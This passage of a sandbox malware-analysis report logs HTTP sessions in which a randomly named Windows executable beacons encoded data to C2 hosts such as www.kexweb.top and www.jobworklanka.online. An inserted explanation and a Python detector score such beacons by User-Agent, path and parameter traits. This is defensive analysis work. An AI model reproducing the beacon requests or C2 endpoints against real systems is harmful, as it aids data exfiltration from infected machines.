                                                                                              Data Raw: 49 34 45 54 35 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 65 72 4c 68 6e 71 69 79 62 59 7a 46 59 6e 46 34 73 4c 4f 6b 51 68 4b 55 62 58 72 72 76 33 6b 61 46 73 32 42 4d 34 6d 66 51 34 68 55 77 62 69 37 70 7a 6f 54 32 4d 6a 6f 4c 54 70 67 74 6e 5a 52 61 79 44 6c 30 6c 2b 58 4f 4d 61 72 48 71 4b 4d 30 5a 58 41 6d 69 6d 6c 4b 2b 4d 38 55 53 35 44 7a 50 71 35 65 55 44 41 54 44 46 6b 57 42 59 46 74 34 4f 32 45 41 73 68 55 2b 32 35 6d 61 69 64 43 52 64 61 73 77 64 69 46 6e 31 35 62 5a 78 6f 32 37 4d 62 39 51 70 31 4d 67 47 52 5a 38 6c 49 65 38 6a 4f 33 51 6b 35 34 57 73 6e 47 34 33 73 70 4c 64 71 44 6c 2b 77 3d 3d
                                                                                              Data Ascii: I4ET5=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15bZxo27Mb9Qp1MgGRZ8lIe8jO3Qk54WsnG43spLdqDl+w==
                                                                                               Oct 8, 2024 15:54:34.593308926 CEST  595                IN         HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:34 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 389
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                               Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                               Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                               19          192.168.2.6  50006        63.250.47.40    80                2356  C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                               Timestamp                            Bytes transferred  Direction  Data
                                                                                               Oct 8, 2024 15:54:36.562881947 CEST  1848               OUT        POST /3bdq/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.kexweb.top
                                                                                              Origin: http://www.kexweb.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.kexweb.top/3bdq/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 2b 52 66 4c 46 70 59 52 4e 4b 67 6f 62 38 6e 36 32 65 4a 66 42 61 77 32 41 36 41 78 6c 76 76 49 4f 73 73 35 66 48 73 34 74 48 74 58 71 59 35 36 35 56 51 35 4f 61 73 33 48 72 58 64 6d 42 78 73 36 58 6b 48 79 2b 77 2f 78 73 59 4d 2b 34 37 2f 44 65 6e 51 4c 4f 69 78 50 5a 43 6c 74 64 33 53 52 2f 63 70 52 66 73 49 34 59 50 36 51 56 48 78 41 36 65 4b 58 6c 72 50 31 67 61 44 4e 67 6d 2f 66 51 2f 73 35 72 4d 58 73 59 69 48 57 42 63 66 76 39 70 32 4e 6c 59 78 76 58 31 6b 49 32 74 78 38 31 [TRUNCATED]
                                                                                              Data Ascii: I4ET5=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWmrLTfqllvYyFYnbosKOkQGKQ3TrryCkcJs3nw4hr84rUwbqbp+nz3MjobXpg9nZRayDnslpV2MYrHpec0FEQmKmhfGM8QC5zTPrZOUBy7DaUWDbFs+O2YTshIY267Pib+RfLFpYRNKgob8n62eJfBaw2A6AxlvvIOss5fHs4tHtXqY565VQ5Oas3HrXdmBxs6XkHy+w/xsYM+47/DenQLOixPZCltd3SR/cpRfsI4YP6QVHxA6eKXlrP1gaDNgm/fQ/s5rMXsYiHWBcfv9p2NlYxvX1kI2tx81qZlIDHqPIUNDQd6gHfCyYknMqNnt6Cc1ErNqDPNNK+dozf1JeEO6iOUE3szxyc/besJsdCL8jiZksP98UOZNGqYBPrCUeg1YW7cuv1okWwpYWQDBsQvD5Wh4exGvwA9nynbLJwfjaBD6+xvw1TFujmxPW+lWOx73s7ZtEAa6lgM3Qp6tehOyqXJnaqSSQzGNdXRG8chq6V0r43q7cNn4g7SOGnL6MrCjt8xnZIeQzB4aSfjURr3yZ8BYORugimlSf7ANzStW4VGJOljGuFJx5cH2PHQcsDmqe0YQtm8Kh4GVVkoCFILDpg2cxNKkXonl+2Dw9dcRXWlVzJvslkesRZk7VTmh7fpwXBVyufH3k07+AUp9/AvUqFtrqs9NbO7Rb5Gk9aM7/JxvlRER68inTDqZtJWjYihm5ldtkTMHGwSP2V0Y4WP760dvR5ym1iZWce7wAasrgk+yYYrQnfCqqLMufCFLARCAnvpqdePohOaeRAq5Di0cocnpoYseTgLvfPl6QDHdkljeXyA9nS/zROkoLUaqI8929VRCB4UrV0tV4cfmrCJR8QYoe8/HFjUvfECvfB/C9eKURd21Ygu4pyA4GCPDKSqdI4vATfgWErQVrU4IxSbmERK/bu6EvOjTRBgOmMMd2rBS91Tbk/3B9vvyBnFx5/g9gu [TRUNCATED]
                                                                                               Oct 8, 2024 15:54:37.140346050 CEST  595                IN         HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:37 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 389
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                               Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                               Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                               20          192.168.2.6  50007        63.250.47.40    80                2356  C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                               Timestamp                            Bytes transferred  Direction  Data
                                                                                               Oct 8, 2024 15:54:39.099855900 CEST  563                OUT        GET /3bdq/?I4ET5=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv0kyrqFFpmLMz7jnyzN+XheUDXt53FO2cfXJKOJNKmSe0FPHbZU=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.kexweb.top
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                               Oct 8, 2024 15:54:39.777832031 CEST  610                IN         HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:39 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 389
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                               Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                               Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                               21          192.168.2.6  50008        91.184.0.200    80                2356  C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                               Timestamp                            Bytes transferred  Direction  Data
                                                                                               Oct 8, 2024 15:54:44.842623949 CEST  838                OUT        POST /ikh0/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.jobworklanka.online
                                                                                              Origin: http://www.jobworklanka.online
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.jobworklanka.online/ikh0/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 63 74 66 75 64 76 48 48 58 71 6c 57 47 2f 36 79 52 51 68 64 31 72 4c 32 54 43 2f 47 6a 49 6f 75 77 6e 30 42 37 36 65 65 6f 4f 64 61 35 6e 6c 47 55 39 6b 4d 33 69 4b 44 57 6a 61 49 70 48 63 30 44 79 41 4d 51 57 71 68 4c 6d 6d 4f 6f 4e 6f 6f 67 59 72 64 6a 77 74 51 35 6e 34 62 48 4c 70 71 39 77 48 74 69 68 6c 38 72 6c 78 35 52 63 49 4e 31 4f 33 31 68 69 62 31 6c 44 30 64 48 36 49 63 4f 2b 31 49 63 65 78 49 32 52 51 37 5a 57 54 48 32 50 75 42 56 66 51 69 49 51 79 50 41 53 69 2f 4f 4d 50 63 76 32 66 76 54 45 76 43 47 33 30 6b 68 33 52 4c 34 48 78 49 43 42 30 4d 38 38 30
                                                                                              Data Ascii: I4ET5=otZcyeHXRsUakctfudvHHXqlWG/6yRQhd1rL2TC/GjIouwn0B76eeoOda5nlGU9kM3iKDWjaIpHc0DyAMQWqhLmmOoNoogYrdjwtQ5n4bHLpq9wHtihl8rlx5RcIN1O31hib1lD0dH6IcO+1IcexI2RQ7ZWTH2PuBVfQiIQyPASi/OMPcv2fvTEvCG30kh3RL4HxICB0M880
                                                                                               Oct 8, 2024 15:54:45.463727951 CEST  500                IN         HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:45 GMT
                                                                                              Server: Apache
                                                                                              X-Xss-Protection: 1; mode=block
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

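Sessions 17 through 21 above all share one request shape regardless of the host: a POST (or, once, a GET) to a short random directory such as /3bdq/ or /ikh0/, a single opaque base64-looking form parameter (I4ET5=...), Origin and Referer that point back at the same host and path, Connection: close plus Cache-Control: max-age=0 as if a browser had submitted a form, and a hard-coded "MSIE 8.0; Windows NT 5.1" User-Agent that no process on a current Windows analysis VM would send. The 404 responses do not mean the beacon failed: the sample moves on to the next host in its list, which is how it reached www.kexweb.top and then www.jobworklanka.online in sequence. The following Python is an added example, not part of the Joe Sandbox report, that scores raw captured requests against those traits; the regexes and the three-indicator threshold are assumptions derived from the captures above, the two beacon samples are transcribed from sessions 17 and 20 (Accept headers omitted), and the benign request is constructed for contrast.

```python
"""Flag FormBook-style HTTP C2 beacons in raw captured requests (added example)."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# User-Agent carried by every beacon in the capture: IE8 on Windows NT 5.1 (XP).
BEACON_UA = (
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; "
    ".NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
)
# Assumed heuristics, generalised from /3bdq/, /ikh0/, I4ET5=..., 5xn03=... in the capture.
PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")
KEY_RE = re.compile(r"^[A-Za-z0-9]{4,6}$")
B64ISH_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: dict[str, str]
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Parse one raw HTTP/1.x request (CRLF or LF line endings) into its parts."""
    head, _, body = raw.replace("\r\n", "\n").strip("\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers: dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")  # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body.strip())


def _kv_pairs(encoded: str) -> list[tuple[str, str]]:
    """Split a=b&c=d without URL-decoding so '+' and '=' inside values survive."""
    return [tuple(part.partition("=")[::2]) for part in encoded.split("&") if part]


def beacon_indicators(req: HttpRequest) -> list[str]:
    """Return the beacon traits present in one request."""
    hits: list[str] = []
    url = urlsplit(req.target)
    host = req.headers.get("host", "")
    if req.headers.get("user-agent") == BEACON_UA:
        hits.append("ie8-on-xp user-agent")
    if PATH_RE.match(url.path):
        hits.append("short random directory path")
    pairs = _kv_pairs(req.body if req.method == "POST" else url.query)
    if pairs and all(KEY_RE.match(k) and B64ISH_RE.match(v) for k, v in pairs):
        hits.append(f"{len(pairs)} opaque base64-like parameter(s)")
    if req.method == "POST":
        if (req.headers.get("origin") == f"http://{host}"
                and req.headers.get("referer") == f"http://{host}{url.path}"):
            hits.append("self-referencing origin/referer")
        if (req.headers.get("connection", "").lower() == "close"
                and req.headers.get("cache-control") == "max-age=0"):
            hits.append("browser-mimicking connection/cache-control on a POST")
    return hits


def is_beacon(req: HttpRequest, threshold: int = 3) -> bool:
    """Assumed cut-off: three or more traits is treated as a beacon."""
    return len(beacon_indicators(req)) >= threshold


def beacon_hosts(raw_requests: list[str]) -> list[str]:
    """Distinct Host values that received beacons (the sample walks a list of domains)."""
    return sorted({parse_request(r).headers.get("host", "")
                   for r in raw_requests if is_beacon(parse_request(r))})


# Transcribed from session 17 (Accept headers dropped).
POST_SAMPLE = """POST /3bdq/ HTTP/1.1
Host: www.kexweb.top
Origin: http://www.kexweb.top
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Connection: close
Cache-Control: max-age=0
Referer: http://www.kexweb.top/3bdq/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

I4ET5=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2NkxlqjV64J6t2LuZcstqBRFEnp7bxquJM796r10gUGVbq87f
"""
# Transcribed from session 20.
GET_SAMPLE = """GET /3bdq/?I4ET5=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv0kyrqFFpmLMz7jnyzN+XheUDXt53FO2cfXJKOJNKmSe0FPHbZU=&5xn03=7vMx2HlPWl HTTP/1.1
Host: www.kexweb.top
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
"""
# Constructed benign request for contrast.
BENIGN_SAMPLE = """GET /search?q=sandbox+report HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0 Safari/537.36
"""

if __name__ == "__main__":
    for raw in (POST_SAMPLE, GET_SAMPLE, BENIGN_SAMPLE):
        req = parse_request(raw)
        print(req.method, req.headers.get("host"), is_beacon(req), beacon_indicators(req))
    print("beaconing hosts:", beacon_hosts([POST_SAMPLE, GET_SAMPLE, BENIGN_SAMPLE]))
```

The traits are scored independently so that a real C2 that happens to answer 200 instead of 404, or a later sample with a different parameter name, still trips the User-Agent and header-shape checks; the User-Agent match alone is a strong signal on any host newer than Windows XP, and pairing it with the process image path seen in the session table (a randomly named executable under Program Files (x86)) narrows it further.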

                                                                                               Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                               22          192.168.2.6  50009        91.184.0.200    80                2356  C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                               Timestamp                            Bytes transferred  Direction  Data
                                                                                               Oct 8, 2024 15:54:47.388355017 CEST  862                OUT        POST /ikh0/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.jobworklanka.online
                                                                                              Origin: http://www.jobworklanka.online
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.jobworklanka.online/ikh0/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 67 6f 76 52 58 30 41 36 36 65 54 49 4f 64 51 5a 6e 67 4c 30 39 37 4d 33 75 43 44 58 50 61 49 70 6a 63 30 44 43 41 4e 6e 69 70 6e 62 6d 6f 56 34 4e 51 6c 41 59 72 64 6a 77 74 51 35 79 6a 62 47 76 70 72 4e 41 48 76 48 4e 6b 32 4c 6c 77 70 78 63 49 66 46 4f 7a 31 68 6a 38 31 6b 65 54 64 42 32 49 63 4d 6d 31 49 4a 72 6e 44 32 51 36 31 35 58 5a 45 6d 72 2b 50 6b 32 72 68 37 41 4b 51 78 75 30 33 59 4e 56 41 63 32 38 39 44 6b 74 43 45 76 47 6b 42 33 37 4a 34 2f 78 61 56 4e 54 44 49 5a 58 47 74 2b 5a 44 42 56 79 45 6d 66 35 41 34 4c 50 33 73 42 65 71 41 3d 3d
                                                                                              Data Ascii: I4ET5=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGWgovRX0A66eTIOdQZngL097M3uCDXPaIpjc0DCANnipnbmoV4NQlAYrdjwtQ5yjbGvprNAHvHNk2LlwpxcIfFOz1hj81keTdB2IcMm1IJrnD2Q615XZEmr+Pk2rh7AKQxu03YNVAc289DktCEvGkB37J4/xaVNTDIZXGt+ZDBVyEmf5A4LP3sBeqA==
Oct 8, 2024 15:54:47.997174025 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:47 GMT
                                                                                              Server: Apache
                                                                                              X-Xss-Protection: 1; mode=block
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 23 | Source IP: 192.168.2.6 | Source Port: 50010 | Destination IP: 91.184.0.200 | Destination Port: 80 | PID: 2356 | Process: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:50.095005035 CEST | 1875 | OUT | POST /ikh0/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.jobworklanka.online
                                                                                              Origin: http://www.jobworklanka.online
                                                                                              Content-Type: application/x-www-form-urlencoded
